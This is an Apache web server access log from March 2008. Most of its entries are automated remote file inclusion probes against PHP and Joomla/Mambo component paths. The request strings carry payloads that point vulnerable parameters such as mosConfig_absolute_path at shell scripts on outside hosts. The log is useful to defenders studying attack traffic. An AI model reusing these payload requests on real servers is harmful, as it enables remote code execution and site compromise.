66.98.246.23 - - [04/Mar/2008:05:22:16 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.shiesty.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.169.155.140 - - [04/Mar/2008:05:22:19 -0800] "GET /administrator/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.35.235 - - [04/Mar/2008:05:22:22 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:05:22:28 -0800] "GET /logs/access_071216.log//spaw_control.class.php?spaw_root=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:05:22:28 -0800] "GET //spaw_control.class.php?spaw_root=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:05:22:29 -0800] "GET /logs//spaw_control.class.php?spaw_root=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:05:22:45 -0800] "GET /logs/access_071202.log//spaw_control.class.php?spaw_root=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:05:23:07 -0800] "GET /logs/access_080107.log/index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:05:23:07 -0800] "GET /logs/index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.72.215.178 - - [04/Mar/2008:05:24:19 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.27.140 - - [04/Mar/2008:05:24:25 -0800] "GET /index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bodo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
87.106.27.140 - - [04/Mar/2008:05:24:25 -0800] "GET /logs/index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bodo.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
64.132.62.107 - - [04/Mar/2008:05:25:06 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.geocities.com/chandramission/rahasia/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.58.169 - - [04/Mar/2008:05:25:13 -0800] "GET /logs/access_080201.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:05:26:26 -0800] "GET /logs/access_080211.log/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:05:26:26 -0800] "GET /logs/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:05:26:28 -0800] "GET /logs/access_080211.log/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:05:26:28 -0800] "GET /logs/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:05:26:32 -0800] "GET /logs/access_080122.log/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:05:26:38 -0800] "GET /logs/access_080122.log/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:05:26:45 -0800] "GET /index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:05:27:13 -0800] "GET /logs/access_080122.log/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:05:27:13 -0800] "GET /logs/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:05:28:44 -0800] "GET /logs/access_080107.log/index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:05:28:44 -0800] "GET /logs/index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:29:12 -0800] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:29:12 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:29:13 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:29:13 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.118.97.161 - - [04/Mar/2008:05:29:17 -0800] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.118.97.161 - - [04/Mar/2008:05:29:17 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.118.97.161 - - [04/Mar/2008:05:29:18 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.118.97.161 - - [04/Mar/2008:05:29:18 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:05:29:52 -0800] "GET /logs/access_080211.log/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:05:29:52 -0800] "GET /mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:05:30:16 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:05:30:16 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:31:05 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:31:05 -0800] "GET //skin/zero_vote/error.php?dir=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:31:05 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:05:31:05 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:05:31:05 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:05:31:05 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.118.97.161 - - [04/Mar/2008:05:31:06 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.118.97.161 - - [04/Mar/2008:05:31:07 -0800] "GET //skin/zero_vote/error.php?dir=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.118.97.161 - - [04/Mar/2008:05:31:07 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.136.6.38 - - [04/Mar/2008:05:31:29 -0800] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
193.136.6.38 - - [04/Mar/2008:05:31:29 -0800] "GET //class/class.dashboard_cms.php?where_framework=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
202.133.244.69 - - [04/Mar/2008:05:32:13 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.244.69 - - [04/Mar/2008:05:32:14 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.244.69 - - [04/Mar/2008:05:32:20 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.145.197 - - [04/Mar/2008:05:32:31 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.197 - - [04/Mar/2008:05:32:31 -0800] "GET /minamijewelry/html/wind.html HTTP/1.0" 200 20882 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
70.169.155.140 - - [04/Mar/2008:05:32:31 -0800] "GET /logs/access_080122.log/administrator/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.169.155.140 - - [04/Mar/2008:05:32:31 -0800] "GET /administrator/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.169.155.140 - - [04/Mar/2008:05:32:32 -0800] "GET /logs/administrator/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:05:32:58 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.133.244.69 - - [04/Mar/2008:05:33:07 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.118.97.161 - - [04/Mar/2008:05:33:16 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.136.6.38 - - [04/Mar/2008:05:33:26 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
193.136.6.38 - - [04/Mar/2008:05:33:26 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
202.133.244.69 - - [04/Mar/2008:05:33:32 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.13.86.150 - - [04/Mar/2008:05:33:46 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:34:06 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.27.140 - - [04/Mar/2008:05:35:24 -0800] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bodo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
87.106.27.140 - - [04/Mar/2008:05:35:24 -0800] "GET /logs/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bodo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:05:35:31 -0800] "GET /logs/http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:05:35:31 -0800] "GET /http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:05:36:00 -0800] "GET /index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:37:03 -0800] "GET /logs/access.log//class/class.dashboard_cms.php?where_framework=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:37:03 -0800] "GET //class/class.dashboard_cms.php?where_framework=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:37:04 -0800] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:37:04 -0800] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:37:04 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:37:04 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.209.50 - - [04/Mar/2008:05:37:34 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://abbe.webd.pl/media/sqlinject.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
85.17.209.50 - - [04/Mar/2008:05:37:34 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://abbe.webd.pl/media/sqlinject.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
195.155.165.40 - - [04/Mar/2008:05:37:53 -0800] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.165.40 - - [04/Mar/2008:05:37:54 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.165.40 - - [04/Mar/2008:05:37:54 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:38:43 -0800] "GET /logs/access_080207.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:05:38:44 -0800] "GET /logs/access_080207.log//class/class.dashboard_cms.php?where_framework=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:05:40:05 -0800] "GET /logs/access_080107.log/index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:05:40:06 -0800] "GET /logs/index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:05:40:13 -0800] "GET /logs/access_080211.log/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:05:40:14 -0800] "GET /logs/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:05:40:19 -0800] "GET /logs/access_080122.log/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.37.15.210 - - [04/Mar/2008:05:40:41 -0800] "GET //components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.emaging.fr/images/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
77.37.15.210 - - [04/Mar/2008:05:40:41 -0800] "GET /logs//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.emaging.fr/images/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
71.6.167.234 - - [04/Mar/2008:05:41:17 -0800] "GET /SQuery/lib/hlife2.php?libpath=http://www.nedaleko.ru/en/img/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
71.6.167.234 - - [04/Mar/2008:05:41:17 -0800] "GET /logs/SQuery/lib/hlife2.php?libpath=http://www.nedaleko.ru/en/img/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
85.17.209.50 - - [04/Mar/2008:05:42:59 -0800] "GET /logs/advguestbook/admin.php?include_path=http://www.endlessride.ch/b?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
85.17.209.50 - - [04/Mar/2008:05:42:59 -0800] "GET /advguestbook/admin.php?include_path=http://www.endlessride.ch/b?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
85.25.144.182 - - [04/Mar/2008:05:44:08 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
85.25.144.182 - - [04/Mar/2008:05:44:08 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
193.136.6.38 - - [04/Mar/2008:05:44:14 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
193.136.6.38 - - [04/Mar/2008:05:44:14 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:05:45:09 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:05:45:09 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:05:45:09 -0800] "GET /logs/access_080131.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:05:45:24 -0800] "GET /logs/access_080121.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
